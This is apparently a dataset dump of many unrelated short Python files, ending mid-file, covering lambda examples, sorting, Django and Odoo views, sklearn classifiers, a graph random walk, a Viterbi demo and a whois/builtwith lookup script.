text stringlengths 38 1.54M |
|---|
#! /usr/bin/env python
# -*- coding:utf-8 -*-
# @Time : 2017/6/18 14:18
# @Author : xiongyaokun
# @Site :
# @File : lambda-example01.py
# @Software: PyCharm
# lambda不会使代码运行效率提高,只是提高代码的简洁性
# lambda作为一个表达式,定义了一个匿名函数,x是入口参数,x+1 是函数体
g = lambda x: x + 1
print g(1) # 2
print g(2) # 3
foo = [2, 18, 9, 22, 17, 24, 8, 12, 27]
print filter(lambda x:x % 3 == 0, foo)
print [x for x in foo if x % 3 == 0]
print map(lambda x: x * 2 + 10, foo)
print [x*2+10 for x in foo]
print reduce(lambda x, y: x + y, foo)
f1 = lambda x,y,z: x+y+z
print f1(1,2,3) # 6
f2 = lambda x,y=2,z=3: x+y+z
print f2(1,y=4,z=5) #10
# lambda 表达式常用来编写跳转表(jump table),就是行为的列表或者字典
L = [
(lambda x: x**2),
(lambda x: x**3),
(lambda x: x**4)
]
print L[0](2), L[1](2), L[2](2) # 4, 8, 16
D = {
'f1': (lambda: 2+3),
'f2': (lambda: 2*3),
'f3': (lambda: 2**3)
}
print D['f1'](), D['f2'](), D['f3']()
# 列表解析比map解析更强大
print [x+y for x in range(5) if x%2 == 0 for y in range(10) if y%2 == 1]
for y in range(10):
if y%2 == 1:
print [x+y for x in range(5) if x%2 == 0] |
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 6 00:15:54 2019
@author: Jens
"""
from scipy import interp
def interp1d( xi, xn, yn ):
# --------------------------------------------
# Inputs
# x1 -- value to interpolate
# xn -- 1D array representing x-values
# yn -- 1D array representing y-values
# Outputs
# yi -- interpolated value
# --------------------------------------------
yi = interp( xi, xn, yn )
return yi
|
from VCF.VcfNormalize import VcfNormalize
from VCF.VcfQC import VcfQC
from VCF.VcfUtils import VcfUtils
|
def merge_sort(arr: list):
"""
Implementation of the Merge Sort algorithm. Sorts a list of integers in
O(N log N) time complexity with O(N) space complexity.
Note that this algorithm performs changes "in place", meaning that the
given array object is edited.
:param arr: The list to be sorted
"""
if len(arr) > 1:
mid = len(arr) // 2
left = arr[:mid]
right = arr[mid:]
merge_sort(left)
merge_sort(right)
i = j = k = 0
while i < len(left) and j < len(right):
if left[i] < right[j]:
arr[k] = left[i]
i += 1
else:
arr[k] = right[j]
j += 1
k += 1
while i < len(left):
arr[k] = left[i]
i += 1
k += 1
while j < len(right):
arr[k] = right[j]
j += 1
k += 1
|
from functools import lru_cache
class Solution:
def maxProfit(self, k: int, prices: List[int]) -> int:
n = len(prices)
if k > n//2:
ans = 0
for i in range(1, n):
if prices[i] > prices[i-1]:
ans += prices[i]-prices[i-1]
return ans
@lru_cache(None)
def dfs(idx, k, buy=1):
if idx > n-1 or k == 0:
return 0
ans = dfs(idx+1, k, buy)
if buy:
ans = max(ans, dfs(idx+1, k, 0) - prices[idx])
else:
ans = max(ans, dfs(idx+1, k-1, 1) + prices[idx])
return ans
return dfs(0, k)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 7 17:48:24 2018
@author: Administrator
"""
import builtwith
# 用这个parse来检测当前这个网站使用了什么技术
#print(builtwith.parse("http://www.sina.com.cn"))
print(builtwith.parse("http://www.sohu.com"))
import whois
#print(whois.whois("http://www.sina.com.cn"))
#{
# "domain_name": "sina.com.cn",
# "registrar": "\u5317\u4eac\u65b0\u7f51\u6570\u7801\u4fe1\u606f\u6280\u672f\u6709\u9650\u516c\u53f8",
# "whois_server": null,
# "referral_url": null,
# "updated_date": null,
# "creation_date": null,
# "expiration_date": null,
# "name_servers": [
# "ns1.sina.com.cn",
# "ns2.sina.com.cn",
# "ns3.sina.com.cn",
# "ns4.sina.com.cn"
# ],
# "status": [
# "clientDeleteProhibited",
# "serverDeleteProhibited",
# "clientUpdateProhibited",
# "serverUpdateProhibited",
# "clientTransferProhibited",
# "serverTransferProhibited"
# ],
# "emails": "domainname@staff.sina.com.cn",
# "dnssec": "unsigned",
# "name": null,
# "org": null,
# "address": null,
# "city": null,
# "state": null,
# "zipcode": null,
# "country": null
#}
print(whois.whois("http://www.baidu.com"))
#{
# "domain_name": [
# "BAIDU.COM",
# "baidu.com"
# ],
# "registrar": "MarkMonitor, Inc.",
# "whois_server": "whois.markmonitor.com",
# "referral_url": null,
# "updated_date": [
# "2017-07-28 02:36:28",
# "2017-07-27 19:36:28"
# ],
# "creation_date": [
# "1999-10-11 11:05:17",
# "1999-10-11 04:05:17"
# ],
# "expiration_date": [
# "2026-10-11 11:05:17",
# "2026-10-11 00:00:00"
# ],
# "name_servers": [
# "DNS.BAIDU.COM",
# "NS2.BAIDU.COM",
# "NS3.BAIDU.COM",
# "NS4.BAIDU.COM",
# "NS7.BAIDU.COM",
# "dns.baidu.com",
# "ns4.baidu.com",
# "ns7.baidu.com",
# "ns2.baidu.com",
# "ns3.baidu.com"
# ],
# "status": [
# "clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited",
# "clientTransferProhibited https://icann.org/epp#clientTransferProhibited",
# "clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited",
# "serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited",
# "serverTransferProhibited https://icann.org/epp#serverTransferProhibited",
# "serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited",
# "clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)",
# "clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)",
# "clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)",
# "serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)",
# "serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)",
# "serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)"
# ],
# "emails": [
# "abusecomplaints@markmonitor.com",
# "whoisrelay@markmonitor.com"
# ],
# "dnssec": "unsigned",
# "name": null,
# "org": "Beijing Baidu Netcom Science Technology Co., Ltd.",
# "address": null,
# "city": null,
# "state": "Beijing",
# "zipcode": null,
# "country": "CN"
#} |
def setBoxColors(bp):
bp['boxes'][0].set( color='b',facecolor='b')
bp['boxes'][1].set( color='r',facecolor='r' )
bp['whiskers'][0].set( color='b')
bp['whiskers'][1].set( color='b')
bp['whiskers'][2].set( color='r')
bp['whiskers'][3].set( color='r')
bp['caps'][0].set( color='b')
bp['caps'][1].set( color='b')
bp['caps'][2].set( color='r')
bp['caps'][3].set( color='r')
bp['medians'][0].set( color='b')
bp['medians'][1].set( color='r')
bp['fliers'][0].set( color='b')
bp['fliers'][1].set( color='r')
#ftiaxnoume ta dataframes mono me numerical values
cols_to_transform.append('Label')
cols_to_transform.append('Id')
box_good=good.drop(cols_to_transform, axis = 1)
box_bad=bad.drop(cols_to_transform, axis =1)
for x in box_good.columns:
fig,ax = plt.subplots()
data=[box_good[x],box_bad[x]]
bp=ax.boxplot(data,positions = [1, 2], widths = 0.6,patch_artist=True)
setBoxColors(bp)
ax.set_title(x)
ax.set_xlabel('Distribution')
ax.set_ylabel('Values')
ax.set_xticklabels(['Good','Bad'])
#ax.set_xticklabels(range(10))
plt.show()
fig.savefig('Numerical Visualization %s' % x)
|
import os
import sys
import argparse
from joblib import dump, load
import numpy as np
import requests
from django.shortcuts import render
import operator
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
MODELS_DIR = os.path.join(BASE_DIR, 'templates\models')
from . import models
def getFINDRISK(d):
score = 0
if d['age'] >= 45 and d['age'] <= 54:
score += 2
elif d['age'] >= 55 and d['age'] <= 64:
score += 3
elif d['age'] >= 65:
score +=4
if d['BMI'] >= 25 and d['BMI'] <= 30:
score += 1
elif d['BMI'] >= 30:
score +=3
if d['waist'] == "1":
score += 4
elif d['waist'] == "2":
score +=4
if d['exercise'] != "5":
score +=2
if d['fvc'] != "5":
score +=1
if d['preparats'] == "1":
score +=2
if d['high_glucose'] == "1":
score +=5
if d['diabete_family'] == "far":
score +=3
elif d['diabete_family'] == "relatives":
score +=5
answer = ""
if score < 7:
answer = "У Вас низкий шанс развития сахарного диабета. Примерно у 1 человека из 100 будет диабет."
elif score >= 7 and score <= 11:
answer = "У Вас немного повышен шанс развития сахарного диабета. Примерно у 1 человека из 25 будет диабет."
elif score >= 12 and score <= 14:
answer = "У Вас умеренный шанс развития сахарного диабета. Примерно у 1 человека из 6 будет диабет."
elif score >= 15 and score <= 20:
answer = "У Вас высокий шанс развития сахарного диабета. Примерно у 1 человека из 3 будет диабет."
elif score >= 20:
answer = "У Вас очень высокий шанс развития сахарного диабета. Примерно у 1 человека из 2 будет диабет."
return answer
def MakeDataForModel(d):
if d['smoking'] == 3:
smoking = 0
else:
smoking = 1
exercise = int(d['exercise'])
FVC = int(d['FVC'])
data = [d['age'], d['gender'], d['education'], smoking, d['HBP'], d['HD'], d['smoking'], exercise, FVC, d['DK']]
return data
def getMODEL(d):
MODEL_FILE = MODELS_DIR + '\model.joblib'
clf = load(MODEL_FILE)
data = np.array(d)
data.reshape(1, -1)
out = clf.predict([d])
if out == 1:
asnwer = "Модель показала результат, что с очень большой вероятностью вы уже имеете у себя сахарный диабет. Настоятельно рекомендуется посетить врача для получения точного диагноза."
else:
asnwer = "Модель показала результат, что вы не больны сахарным диабетом на данный момент."
return asnwer
# Create your views here.
def index(request):
return render(request, 'diabet/index.html')
def about(request):
return render(request, 'diabet/about.html')
def poll(request):
return render(request, 'diabet/poll.html')
def result(request):
if request.method == 'POST':
if request.POST.get('suggestions') != "":
models.Comments.objects.create(text=request.POST.get('suggestions'))
age = int(request.POST.get('age'))
DK = int(request.POST.get('DK'))
gender = int(request.POST.get('gender'))
race = int(request.POST.get('race'))
education = int(request.POST.get('education'))
smoking = int(request.POST.get('smoking'))
heart_diseases = int(request.POST.get('heart_diseases'))
high_blood_presure = int(request.POST.get('high_blood_presure'))
height = float(request.POST.get('height'))
weight = float(request.POST.get('weight'))
BMI = weight / (height * height)
waist = request.POST.get('waist')
exercise = request.POST.get('exercise')
fvc = request.POST.get('fvc')
preparats = request.POST.get('preparats')
high_glucose = request.POST.get('high_glucose')
diabete_family = request.POST.get('diabete_family')
FINDRISK_DATA = {
'age':age, 'BMI':BMI, 'waist':waist , 'exercise':exercise, 'fvc':fvc,
'preparats':preparats, 'high_glucose':high_glucose, 'diabete_family':diabete_family,
}
NotClearMODELDATA = {
'age':age, 'gender':gender, 'race':race , 'education':education, 'smoking':smoking,
'HBP':high_blood_presure, 'HD':heart_diseases, 'exercise':exercise,
'FVC':fvc, 'DK':DK,
}
ModelData = MakeDataForModel(NotClearMODELDATA)
MODEL_SCORE = getMODEL(ModelData)
FINDRISK_SCORE = getFINDRISK(FINDRISK_DATA)
scores = {
'FINDRISK_SCORE' : FINDRISK_SCORE, 'MODEL_SCORE': MODEL_SCORE,
}
return render(request, 'diabet/results.html', scores)
|
from django.conf.urls import patterns, url
from stories import views
urlpatterns = patterns('',
url(r'^$', views.index, name='index'),
url(r'^detail/(?P<story_id>\d+)/$', views.detail, name='detail'),
url(r'^stories/$', views.stories, name='index'),
url(r'^poems/$', views.poems, name='index'),
)
|
import time
from unittest import mock
import docker
from sqlalchemy import create_engine
from snowshu.adapters.target_adapters import PostgresAdapter
from snowshu.configs import DOCKER_REMOUNT_DIRECTORY, LOCAL_ARCHITECTURE
from snowshu.core.docker import SnowShuDocker
from snowshu.logger import Logger
from tests.common import rand_string
from tests.integration.snowflake.test_end_to_end import DOCKER_SPIN_UP_TIMEOUT
Logger().set_log_level(0, 0)
TEST_NAME, TEST_TABLE = [rand_string(10) for _ in range(2)]
def test_creates_replica(docker_flush):
# build image
# load it up with some data
# convert it to a replica
# spin it all down
# start the replica
# query it and confirm that the data is in there
client = docker.from_env()
arch_input_options = {
'amd64': {
'input_arch_list': ['amd64'],
'result_images': ['latest', 'amd64'] if LOCAL_ARCHITECTURE == 'amd64' else ['amd64'],
'active_container_arch': 'amd64',
'passive_container_arch': None
},
'arm64': {
'input_arch_list': ['arm64'],
'result_images': ['latest', 'arm64'] if LOCAL_ARCHITECTURE == 'arm64' else ['arm64'],
'active_container_arch': 'arm64',
'passive_container_arch': None
},
'all': {
# this case is different per machine type it runs in to save time
'input_arch_list': ['arm64', 'amd64'] if LOCAL_ARCHITECTURE == 'arm64' else ['amd64', 'arm64'],
'result_images': ['latest', 'arm64', 'amd64'],
'active_container_arch': 'arm64' if LOCAL_ARCHITECTURE == 'arm64' else 'amd64',
'passive_container_arch': 'amd64' if LOCAL_ARCHITECTURE == 'arm64' else 'arm64'
}
}
for case_name, case_vars in arch_input_options.items():
# docker_flush does not happen in between these loop cycles,
# so containers of the same name get mixed up
test_name_local = f'{TEST_NAME}-{case_name}'
shdocker = SnowShuDocker()
target_adapter = PostgresAdapter(replica_metadata={})
target_container, passive_container = shdocker.startup(
target_adapter,
'SnowflakeAdapter',
case_vars['input_arch_list'],
envars=['POSTGRES_USER=snowshu',
'POSTGRES_PASSWORD=snowshu',
'POSTGRES_DB=snowshu',
f'PGDATA=/{DOCKER_REMOUNT_DIRECTORY}'])
# add containers to adapter so that later target_adapter.copy_replica_data() works
target_adapter.container = target_container
target_adapter.passive_container = passive_container
# assert if container architectures are as expected
if passive_container:
assert passive_container.name.split('_')[-1] == case_vars['passive_container_arch']
assert target_container.name.split('_')[-1] == case_vars['active_container_arch']
# load test data
time.sleep(DOCKER_SPIN_UP_TIMEOUT) # give pg a moment to spin up all the way
engine = create_engine(
'postgresql://snowshu:snowshu@snowshu_target:9999/snowshu')
engine.execute(
f'CREATE TABLE {TEST_TABLE} (column_one VARCHAR, column_two INT)')
engine.execute(
f"INSERT INTO {TEST_TABLE} VALUES ('a',1), ('b',2), ('c',3)")
checkpoint = engine.execute(f"SELECT * FROM {TEST_TABLE}").fetchall()
assert ('a', 1) == checkpoint[0]
# copy data to passive container if exists
target_adapter.copy_replica_data()
replica_list = shdocker.convert_container_to_replica(test_name_local,
target_container,
passive_container)
# assert correct replicas have been created
# latest tag is attached to the same image instace as native arch one,
# hence unnesting loop here
arch_list_created_replicas = [tag.split(':')[1] for x in replica_list for tag in x.tags]
assert sorted(arch_list_created_replicas) == sorted(case_vars['result_images'])
for replica in replica_list:
# get a new replica
client = docker.from_env()
client.containers.run(replica.id,
ports={'9999/tcp': 9999},
name=test_name_local,
network='snowshu',
detach=True)
time.sleep(DOCKER_SPIN_UP_TIMEOUT) # give pg a moment to spin up all the way
engine = create_engine(
f'postgresql://snowshu:snowshu@{test_name_local}:9999/snowshu')
res = engine.execute(f'SELECT * FROM {TEST_TABLE}').fetchall()
assert ('a', 1,) in res
assert ('b', 2,) in res
assert ('c', 3,) in res
# verify that the extra OS packages are installed
res = engine.execute("create extension plpython3u;")
shdocker.remove_container(test_name_local)
|
from odoo import api, fields, models, _
class Sale_Order(models.Model):
_inherit = "sale.order"
custom_create_date=fields.Date("Create Date")
phone_no=fields.Char(string='Phone')
@api.model
def create(self, vals):
if vals.get('name', _('New')) == _('New'):
if 'company_id' in vals:
vals['name'] = self.env['ir.sequence'].with_context(force_company=vals['company_id']).next_by_code(
'sale.order') or _('New')
else:
vals['name'] = self.env['ir.sequence'].next_by_code('sale.order') or _('New')
# Makes sure partner_invoice_id', 'partner_shipping_id' and 'pricelist_id' are defined
if any(f not in vals for f in ['partner_invoice_id', 'partner_shipping_id', 'pricelist_id']):
partner = self.env['res.partner'].browse(vals.get('partner_id'))
addr = partner.address_get(['delivery', 'invoice'])
vals['partner_invoice_id'] = vals.setdefault('partner_invoice_id', addr['invoice'])
vals['partner_shipping_id'] = vals.setdefault('partner_shipping_id', addr['delivery'])
vals['pricelist_id'] = vals.setdefault('pricelist_id',
partner.property_product_pricelist and partner.property_product_pricelist.id)
result = super(Sale_Order, self).create(vals)
result.write({'custom_create_date': result.create_date})
return result
@api.model
def search(self, args, offset=0, limit=None, order=None, count=False):
menus = super(Sale_Order, self).search(args, offset=0, limit=None, order=order, count=False)
if menus:
# menu filtering is done only on main menu tree, not other menu lists
for arg in args:
if 'name' in arg:
var=arg[2]
print(var)
# if not self._context.get('ir.ui.menu.full_list'):
# menus = menus._filter_visible_menus()
# if offset:
# menus = menus[long(offset):]
# if limit:
# menus = menus[:long(limit)]
return len(menus) if count else menus
# class Account_Invoice(models.Model):
# _inherit = "account.invoice"
#
# # @api.depends('company_id')
# # def deafult_company(self):
# # for each in self:
# #
# # user_id=self.env['res.users'].search([('id','=',each.env.uid)])
# #
# # each.company_id=user_id.company_id.id
# # return each.company_id
#
# company_id=fields.Many2one('res.company','Company', default=lambda self: self.env.user.company_id)
# class Res_Company(models.Model):
# _inherit = "res.company"
#
#
#
# send_note=fields.Text()
|
def bucle_10():
nfinal=input("hasta que numero quieres sumar")
numeros_pares=0
numeros_impares=0
for numero in range(1,nfinal+1):
if(numero%2==0):
print str(numero), "es par"
numeros_pares=numeros_pares+1
else:
print str(numero), "es impar"
numeros_impares=numeros_impares+1
print "he contado", numeros_pares, " numeros pares"
print "he contado", numeros_impares, "numeros impares"
bucle_10()
|
from kivy.event import EventDispatcher
from kivy.clock import Clock
from kivy.properties import DictProperty, ListProperty
from kivy.logger import Logger
import netcheck
PURCHASE_STARTED=True
PURCHASE_SUCCESS=False
PURCHASE_RETRY_SUCCESS=True
class MockBilling(EventDispatcher):
consumed = DictProperty()
def __init__(self, key, skus, *args, **kwargs):
super(MockBilling, self).__init__(*args, **kwargs)
self.error_msg = 'debugging'
self.skus = skus
def purchase(self, sku, callback=None):
callback = callback if callback else lambda *args, **kwargs: None
if PURCHASE_STARTED:
Logger.info('Ha ha faking purchase of ' + sku)
self.purchase_callback = callback
self.purchasing = sku
self._process_purchase()
return PURCHASE_STARTED
def retry_prompt(self, callback):
''' monkey patch here to implement a real prompt'''
callback(False)
def set_retry_prompt(self, fn):
self.retry_prompt = fn
def _process_purchase(self):
sku = self.purchasing
if not netcheck.connection_available():
netcheck.ask_connect(self._connection_callback)
else:
def purchase_response(dt):
if PURCHASE_SUCCESS:
c = self.consumed
if c.has_key(sku):
self.consumed[sku] += 1
else:
self.consumed[sku] = 1
self.purchase_callback(True, '')
else:
self._fail()
Clock.schedule_once(purchase_response, 0.5)
def _connection_callback(self, connected):
Logger.info('in billing connection callback: ' + str(connected))
if connected:
self._process_purchase()
else:
self._fail()
def _fail(self):
self._ask_retry()
def _ask_retry(self):
self.retry_prompt(self._retry_callback)
def _retry_callback(self, retry):
if retry:
global PURCHASE_SUCCESS
PURCHASE_SUCCESS = PURCHASE_RETRY_SUCCESS
self._process_purchase()
else:
self.purchase_callback(False, self.error_msg)
self.purchasing = self.purchase_callback = None
|
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import pickle
from sklearn import preprocessing, metrics
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import LinearSVC
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.neural_network import MLPClassifier
graduates_data = pd.read_csv('score_board_train.csv', delimiter=";")
le = preprocessing.LabelEncoder()
#convert the categorical columns into numeric
graduates_data['accepted'] = le.fit_transform(graduates_data['accepted'])
graduates_data['graduated'] = le.fit_transform(graduates_data['graduated'])
graduates_data['id'] = le.fit_transform(graduates_data['id'])
graduates_data['art_exam'] = graduates_data['art_exam']*100
graduates_data['art_exam'] = graduates_data['art_exam'].round(decimals = 3)
graduates_data['maths_exam'] = graduates_data['maths_exam']*100
graduates_data['maths_exam'] = graduates_data['maths_exam'].round(decimals = 3)
graduates_data['language_exam'] = graduates_data['language_exam']*100
graduates_data['language_exam'] = graduates_data['language_exam'].round(decimals = 3)
graduates_data['interview_score'] = graduates_data['interview_score']*100
graduates_data['interview_score'] = graduates_data['interview_score'].round(decimals = 3)
graduates_data['essay_score'] = graduates_data['essay_score']*100
graduates_data['essay_score'] = graduates_data['essay_score'].round(decimals = 2)
graduates_data['gpa'] = graduates_data['gpa'].round(decimals = 3)
cols = [col for col in graduates_data.columns \
if col not in ['id','graduated', 'accepted', 'year']]
data = graduates_data[cols]
target = graduates_data['graduated']
#split data set into train and test sets
data_train, data_test, target_train, target_test = train_test_split(data,target, test_size = 0.15, random_state = 10)
gauss_model = GaussianNB()
gauss_model.fit(data_train, target_train)
y_pred = gauss_model.predict(data_test)
print ("Gaussian score : ",accuracy_score(target_test, y_pred))
neigh_model = KNeighborsClassifier(n_neighbors=50, algorithm='auto')
neigh_model.fit(data_train, target_train)
pred = neigh_model.predict(data_test)
print ("Kneighbors accuracy score : ",accuracy_score(target_test, pred))
svc_model = LinearSVC(random_state=0,max_iter = 5000)
pred = svc_model.fit(data_train, target_train).predict(data_test)
print("LinearSVC accuracy : ",accuracy_score(target_test, pred, normalize = True))
rfc_model = RandomForestClassifier(n_estimators=100)
pred_rfc = rfc_model.fit(data_train, target_train).predict(data_test)
print("RandomForestClassifier : ",accuracy_score(target_test, pred_rfc, normalize = True))
mlp_model = MLPClassifier()
pred_mlp = mlp_model.fit(data_train, target_train).predict(data_test)
print("MLP accuracy : ",accuracy_score(target_test, pred_mlp, normalize = True))
#ada_model = AdaBoostClassifier()
#pred_ada = ada_model.fit(data_train,target_train).predict(data_test)
#print("AdaBoost accuracy : ",accuracy_score(target_test, pred_ada, normalize = True))
pickle.dump(neigh_model, open("model_neigh.pkl","wb")) |
from django.db import models
class Compradores(models.Model):
id = models.IntegerField(primary_key=True)
nombre = models.CharField(max_length=200)
apellido = models.CharField(max_length=200)
direccion = models.CharField(max_length=200)
ciudad = models.CharField(max_length=200)
longitud = models.CharField(max_length=200)
latitud = models.CharField(max_length=200)
estado_geo = models.CharField(max_length=200)
def __int__(self):
return self.id
|
import pygame
size=[25,25]
rsize=[size[0]*16,size[1]*16]
sw={273:[0,-1],
274:[0,1]}
def bigPx(x,y,c):
x=x-2
y=y-2
print("x:",x,"y:",y)
for i in range(4):
for j in range(4):
pxarray[4*x+i+1,4*y+j+1]=c
def step():
pygame.display.flip()
clock.tick(40)
surface = pygame.display.set_mode(size=(rsize[0],rsize[1]))
pxarray = pygame.PixelArray(surface)
clock=pygame.time.Clock()
while True:
step()
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
dirval=sw.get(event.key)
|
import random
from collections import OrderedDict
from operator import itemgetter
class Grafo:
def __init__(self):
self.grafo = {}
self.cant_vertices = 0
self.cant_aristas = 0
def agregar_vertice(self, elemento):
self.grafo[elemento] = {}
self.cant_vertices += 1
def eliminar_vertice(self, elemento):
if elemento in self.grafo:
for adyacente in self.grafo[elemento]:
self.grafo[adyacente].pop(elemento)
self.cant_aristas -= 1
self.grafo.pop(elemento)
self.cant_vertices -= 1
def agregar_arista(self, elemento1, elemento2):
self.grafo[elemento1][elemento2] = None
self.grafo[elemento2][elemento1] = None
self.cant_aristas += 1
def eliminar_arista(self, elemento1, elemento2):
if elemento1 in self.grafo[elemento2]:
self.grafo[elemento1].pop(elemento2)
self.grafo[elemento2].pop(elemento1)
self.cant_aristas -= 1
else:
raise Exception("Los elementos no están conectados")
def son_adyacentes(self, elemento1, elemento2):
return (elemento1 in self.grafo[elemento2])
def obtener_adyacentes(self, elemento):
return self.grafo[elemento]
def existe_vertice(self, elemento):
valor = self.grafo.get(elemento)
if valor == None:
return False
return True
def obtener_identificadores(self):
return self.grafo.keys()
def cantidad_vertices(self):
return self.cant_vertices
def cantidad_aristas(self):
return self.cant_aristas
def crear_grafo():
grafo = Grafo()
grafo.agregar_vertice("Genji")
grafo.agregar_vertice("Pharah")
grafo.agregar_vertice("McCree")
grafo.agregar_vertice("Reaper")
grafo.agregar_vertice("Sombra")
grafo.agregar_vertice("Tracer")
grafo.agregar_vertice("Hanzo")
grafo.agregar_vertice("Mei")
grafo.agregar_vertice("Widow")
grafo.agregar_vertice("DVA")
grafo.agregar_vertice("Reinhardt")
grafo.agregar_vertice("Zarya")
grafo.agregar_vertice("Ana")
grafo.agregar_vertice("Lucio")
grafo.agregar_vertice("Mercy")
grafo.agregar_vertice("Symmetra")
grafo.agregar_vertice("Soldier")
grafo.agregar_vertice("Zenyatta")
grafo.agregar_arista("Genji", "Hanzo")
grafo.agregar_arista("Genji", "McCree")
grafo.agregar_arista("Genji", "Pharah")
grafo.agregar_arista("Genji", "Reaper")
grafo.agregar_arista("Pharah", "Ana")
grafo.agregar_arista("Pharah", "Mercy")
grafo.agregar_arista("Tracer", "Sombra")
grafo.agregar_arista("Tracer", "Ana")
grafo.agregar_arista("Tracer", "Lucio")
grafo.agregar_arista("Tracer", "Mercy")
grafo.agregar_arista("Tracer", "Widow")
grafo.agregar_arista("Tracer", "Reinhardt")
grafo.agregar_arista("McCree", "Hanzo")
grafo.agregar_arista("McCree", "Pharah")
grafo.agregar_arista("McCree", "Ana")
grafo.agregar_arista("McCree", "Reaper")
grafo.agregar_arista("McCree", "Sombra")
grafo.agregar_arista("Reaper", "Soldier")
grafo.agregar_arista("Reaper", "Ana")
grafo.agregar_arista("Reaper", "Sombra")
grafo.agregar_arista("Reaper", "Widow")
grafo.agregar_arista("Reaper", "Soldier")
grafo.agregar_arista("Sombra", "Widow")
grafo.agregar_arista("Sombra", "Symmetra")
grafo.agregar_arista("Tracer", "Widow")
grafo.agregar_arista("Tracer", "Lucio")
grafo.agregar_arista("Tracer", "Reinhardt")
grafo.agregar_arista("Tracer", "Mercy")
grafo.agregar_arista("Mei", "Mercy")
grafo.agregar_arista("Mei", "DVA")
grafo.agregar_arista("Mei", "Soldier")
grafo.agregar_arista("Mei", "Zarya")
grafo.agregar_arista("Ana", "Reinhardt")
grafo.agregar_arista("Ana", "Soldier")
grafo.agregar_arista("Mercy", "Soldier")
return grafo
def random_walks(grafo,vertice,n):
actual = vertice
recorridos={}
for i in range(0, n):
adyacentes = grafo.obtener_adyacentes(actual)
if not actual in recorridos:
recorridos[actual]=1
else:
recorridos[actual]+=1
actual = random.choice(list(adyacentes))
return recorridos
def similares(grafo,usuario,n):
dic={}
for i in range(0, 3):
walks = random_walks(grafo,usuario,100)
lista = sorted(walks.items(), key=lambda x:x[1])
for usuario, apariciones in lista:
if usuario in dic:
dic[usuario] += apariciones
else:
dic[usuario] = apariciones
result = sorted(dic.items(), key=lambda x:x[1])
if usuario in result:
result.remove(usuario)
for y in range(len(result) - 1, len(result) - n -1, -1):
if y == len(result) - n:
print("{}.\n".format(result[y][0]))
else:
print("{}, ".format(result[y][0]), end='')
grafo = crear_grafo()
similares(grafo, "Tracer", 3)
|
from bottle import route, run
import requests
# API server of Bulkan
run(host='localhost', port=8080)
|
from django.db.models import Q
from rest_framework import generics, permissions
from rest_framework.pagination import PageNumberPagination
from . import serializers
from .models import Product, ProductImages
from .serializers import ProductImageSerializer
class StandardResultsSetPagination(PageNumberPagination):
page_size = 5
page_size_query_param = 'page_size'
max_page_size = 1000
class ProductListView(generics.ListAPIView):
queryset = Product.objects.all()
serializer_class = serializers.ProductSerializer
permission_classes = (permissions.IsAuthenticated,)
pagination_class = StandardResultsSetPagination # чтобы разбить по страницам
class ProductCreateView(generics.CreateAPIView):
queryset = Product.objects.all()
serializer_class = serializers.ProductSerializer
permission_classes = (permissions.IsAdminUser,)
class ProductRetrieveView(generics.RetrieveAPIView):
queryset = Product.objects.all()
serializer_class = serializers.ProductSerializer
permission_classes = (permissions.IsAuthenticated,)
class ProductDestroyView(generics.DestroyAPIView):
queryset = Product.objects.all()
serializer_class = serializers.ProductSerializer
permission_classes = (permissions.IsAdminUser,)
class ProductImageView(generics.ListAPIView):
queryset = ProductImages.objects.all()
serializer_class = ProductImageSerializer
def get_serializer_context(self):
return {'request': self.request}
class ProductUpdateView(generics.UpdateAPIView):
queryset = Product.objects.all()
serializer_class = serializers.ProductSerializer
permission_classes = (permissions.IsAdminUser,)
class ProductFilterView(generics.ListAPIView):
queryset = Product.objects.all()
serializer_class = serializers.ProductSerializer
def get_queryset(self):
query = self.request.GET.get('q')
object_list = Product.objects.filter(
Q(title__icontains=query) | Q(price__icontains=query)
)
return object_list
|
# wikipedia
def print_dptable(V):
print "",
for i in range(len(V)): print "%7d" % i,
print
for y in V[0].keys():
print "%.5s: " % y,
for t in range(len(V)):
print "%.7s" % ("%f" % V[t][y]),
print
def viterbi(obs, states, start_p, trans_p, emit_p):
V = [{}]
path = {}
for y in states:
V[0][y] = start_p[y] * emit_p[y][obs[0]]
path[y] = [y]
for t in range(1,len(obs)):
V.append({})
newpath = {}
for y in states:
(prob, state) = max([(V[t-1][y0] * trans_p[y0][y] * emit_p[y][obs[t]], y0) for y0 in states])
V[t][y] = prob
newpath[y] = path[state] + [y]
path = newpath
print_dptable(V)
(prob, state) = max([(V[len(obs) - 1][y], y) for y in states])
return (prob, path[state])
def example():
return viterbi(observations,
states,
start_probability,
transition_probability,
emission_probability)
states = ('1', '2', '3', '4')
observations = ('L', 'U', 'U', 'G', 'U', 'U', 'L', 'L', 'L', 'U', 'G', 'L', 'G')
start_probability = {'1': 0.25, '2': 0.25, '3': 0.25, '4': 0.25}
transition_probability = {
'1' : {'1': 0.1, '2': 0.2, '3': 0.5, '4': 0.2},
'2' : {'1': 0.4, '2': 0.2, '3': 0.2, '4': 0.2},
'3' : {'1': 0.2, '2': 0.2, '3': 0.3, '4': 0.3},
'4' : {'1': 0.2, '2': 0.1, '3': 0.3, '4': 0.4},
}
emission_probability = {
'1' : {'G': 0.5, 'L': 0.3, 'U': 0.2 },
'2' : {'G': 0.2, 'L': 0.4, 'U': 0.4 },
'3' : {'G': 0.4, 'L': 0.5, 'U': 0.1 },
'4' : {'G': 0.3, 'L': 0.3, 'U': 0.4 },
}
print example() |
import pickle
import os
from text_preprocessing import preprocess_text
import math
import heapq
#--------------------------------------------------------STORING_DATA_FUNCTIONS------------------------------------------------------------------
